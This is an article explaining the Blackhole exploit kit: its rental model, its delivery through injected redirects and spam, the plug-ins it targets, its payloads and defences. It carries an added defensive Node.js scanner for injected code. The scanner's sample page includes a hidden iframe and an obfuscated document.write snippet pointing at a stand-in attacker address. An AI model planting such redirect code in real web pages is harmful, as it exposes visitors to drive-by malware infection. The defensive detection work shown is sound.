Blackhole Exploit Kit: Popular Malware Among Cybercriminals

The Blackhole exploit kit is a collection of malicious code hosted on attacker-controlled websites and reached through redirect code that criminals illegally inject into legitimate websites they have hacked. The code is designed to detect and exploit vulnerabilities in Web browsers and their plug-ins, putting the PCs that visit those pages at risk.

In 2011, Blackhole was the most popular browser exploit kit among cybercriminals, according to Trend Micro, an Internet security company. As of Oct. 22, 2013, Blackhole ranked 60th among all online malware worldwide, affecting users in 212 countries and more than 18,000 websites, according to AVG Threat Labs.

The exploit kit was developed and sold in the underground cybermarket, and its author had been difficult for authorities to track down. However, the hacker who created and managed Blackhole was arrested in early October 2013, which may have somewhat reduced the threat.

Exploit kits are bundles of software designed to commit crimes, or crimeware. They enable criminals to package and distribute many different pieces of malware, and also to manage the botnets that some of that malware creates.

Kits that focus on infecting users through Web attacks are known as browser exploit kits or browser exploit packs. A browser exploit kit tries many different exploits against the visiting browser and its plug-ins, greatly increasing the chances that one of them will succeed and infect the computer.

Blackhole, the most common of the browser exploit kits, is sold on a rental model: criminals pay for the use and maintenance of the hosted exploit kit for a specific period of time. The first release of Blackhole charged up to $1,500 per year for a license.

The Blackhole exploit kit is a favorite of online criminals because of the high volume of traffic redirected to it; that traffic is fundamental to an exploit kit's success. Blackhole is also good at evading detection, which is a huge selling point. A kit will fail if it is easily blocked by URL filtering, intrusion detection systems (IDS) or content inspection.

Most importantly, the business model works. The kits are competitively priced, and actively maintained kits such as Blackhole are updated with the latest exploits proven to work against the major Web browsers and their plug-ins.

A Blackhole attack typically begins with pages served by legitimate websites and servers being compromised and seeded with malicious code. When users browse these pages, the code (often malicious JavaScript) silently loads content from the exploit kit's own server, with no visible change to the page the user sees.

Criminals using the Blackhole exploit kit also use spam email, tempting users to click on embedded Web links by impersonating a reputable site or organization, such as LinkedIn, the U.S. Postal Service, US Airways, Facebook and PayPal. The embedded links open compromised websites in the user's Web browser.

A white paper by Trend Micro describes a typical email-based attack:

  1. Spam arrives in a user's inbox.
  2. A link embedded in the email leads to a compromised website.
  3. A page on the compromised website redirects the user to a page on a malicious website.
  4. The page attempts to exploit various software vulnerabilities in the user's system.
  5. If one of the attempts works — because the user's computer has not been updated with the latest security patches, for example — a malware variant is downloaded, infecting the user's computer.
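As an added example that is not part of the original article or of the kit itself, the following Node.js script shows what the injected code in steps 2 and 3 looks like from a defender's side and flags it. It scans a page's HTML for a hidden iframe that loads content from a different host, and for an inline script that decodes obfuscated data (unescape, eval, String.fromCharCode) and writes it into the page at load time. The indicator thresholds, the marker lists and the sample page, including its .test hostnames and TEST-NET-2 address, are constructed for this example and are not a vendor signature set.

```javascript
'use strict';

// Added example for this article, not code from the page or from the kit.
// Scans a page's HTML for the two injection patterns described in the text:
//   1. a hidden iframe that silently loads a page from a different host;
//   2. an inline script that decodes obfuscated data and writes it into the page.
// Thresholds and marker lists are this example's assumptions, not a vendor signature set.

const HIDDEN_DIMENSION = 2; // assumption: a frame 2px or smaller is invisible to the user

const OBFUSCATION_MARKERS = [
  /\beval\s*\(/i,
  /\bunescape\s*\(/i,
  /String\.fromCharCode\s*\(/i,
];
const WRITE_MARKERS = [
  /document\.write\s*\(/i,
  /\.innerHTML\s*=/i,
  /createElement\s*\(\s*['"]iframe['"]\s*\)/i,
];

// Parse name="value", name='value' and name=value pairs out of one tag's text.
function parseAttributes(tagText) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Hostname of an absolute URL, or null for relative or invalid values.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// A frame the user cannot see: tiny dimensions or hidden via inline CSS.
function isHiddenFrame(attrs) {
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  return (Number.isFinite(w) && w <= HIDDEN_DIMENSION) ||
         (Number.isFinite(h) && h <= HIDDEN_DIMENSION) ||
         style.includes('display:none') ||
         style.includes('visibility:hidden');
}

// Returns one finding per suspicious element; an empty array means nothing was flagged.
function findInjectedRedirects(html, siteHost) {
  const findings = [];
  const site = siteHost.toLowerCase();
  let m;

  // Pattern 1: hidden iframe pointing at another host.
  const iframeRe = /<iframe\b[^>]*>/gi;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[0]);
    const host = hostOf(attrs.src || '');
    if (host && host !== site && isHiddenFrame(attrs)) {
      findings.push({ kind: 'hidden-iframe', host, src: attrs.src });
    }
  }

  // Pattern 2: inline script that both decodes obfuscated data and writes content.
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const markers = OBFUSCATION_MARKERS.filter((re) => re.test(body)).length;
    const writes = WRITE_MARKERS.some((re) => re.test(body));
    if (markers > 0 && writes) {
      findings.push({ kind: 'obfuscated-script', markers, snippet: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample: a legitimate page whose footer has been injected.
// Hostnames use the reserved .test TLD and a TEST-NET-2 address; none is real.
const SAMPLE_HTML = `
<html><body>
<h1>Example Widgets Inc.</h1>
<iframe src="https://video.partner.test/embed/42" width="560" height="315"></iframe>
<script>document.getElementById('year').textContent = new Date().getFullYear();</script>
<iframe src="http://198.51.100.23/index.php?id=3" width="1" height="1" style="visibility:hidden"></iframe>
<script>
var s = unescape("%3Ciframe%20src%3D%22http%3A//198.51.100.23/go.php%22%20width%3D1%20height%3D1%3E%3C/iframe%3E");
document.write(s);
</script>
</body></html>`;

function main() {
  const findings = findInjectedRedirects(SAMPLE_HTML, 'www.example-widgets.test');
  console.log(`${findings.length} suspicious element(s) found`);
  for (const f of findings) console.log(JSON.stringify(f));
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) main();
```

Run with `node scan.js`; the sample page yields two findings, the 1x1 hidden frame and the unescape/document.write script, while the visible video embed and the ordinary footer script pass. The heuristics are deliberately loose and will also flag some legitimate pages (1x1 tracking frames, minified scripts that happen to use String.fromCharCode), so treat a hit as a lead for an analyst rather than a verdict, and pair it with the URL filtering and intrusion detection controls the article mentions.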

Blackhole targets many browser vulnerabilities, especially among plug-ins that provide browser support for Adobe Reader, Adobe Flash and Java — all of which are commonly used on business and consumer PCs.

Once an exploit succeeds, the kit delivers the "payload," the malware the attacker actually wants to run on the victim's computer. Common Blackhole payloads include fake anti-virus software, the ZeuS banking Trojan, the TDSS and ZeroAccess rootkits and many forms of ransomware.

A warning pop-up from your installed anti-virus software while you browse usually means it caught and blocked the payload, and your PC is probably safe. A pop-up from the Web page itself claiming your computer is infected is a different matter: fake anti-virus alerts are one of the payloads listed above, so close the browser rather than clicking anything in it. Beyond that, there are a number of ways to keep your computer and data safe from the Blackhole exploit kit.

It's important to keep your operating system up to date, as well as all of the other software on your PC, in particular the browser plug-ins the kit targets (Adobe Reader, Adobe Flash and Java). Never accept downloads from unknown sources or click links in emails from unfamiliar senders.

Anti-virus software can block many of the payloads delivered by the Blackhole exploit kit, as well as by other exploit kits and types of malware. It must be kept up to date to recognize newer malware, since attackers constantly release new code. Because exploit kits are built to evade detection, though, anti-virus is a second line of defense; keeping the browser and its plug-ins patched is what removes the vulnerabilities the kit relies on.

After a threat is detected, it's best to perform a full scan of the device with updated anti-virus definitions. Tom's Guide sister site TopTenReviews has compared anti-virus software and recommends Bitdefender, Kaspersky and Norton, among others.

The impact of the recent arrest of the hacker behind the Blackhole exploit kit remains to be seen. It's not clear whether Blackhole will disappear, be taken over by other developers or be replaced by other exploit kits.

Tom's Guide Staff


  • meowmix44
    lol... I bet there's a new kit out as I type.
  • Darkk
    The biggest threat is the ads on various websites that are linked to malicious websites. If the OS, Java, Flash, etc. aren't updated it can take advantage of the exploit without the user even doing anything other than surf the websites normally.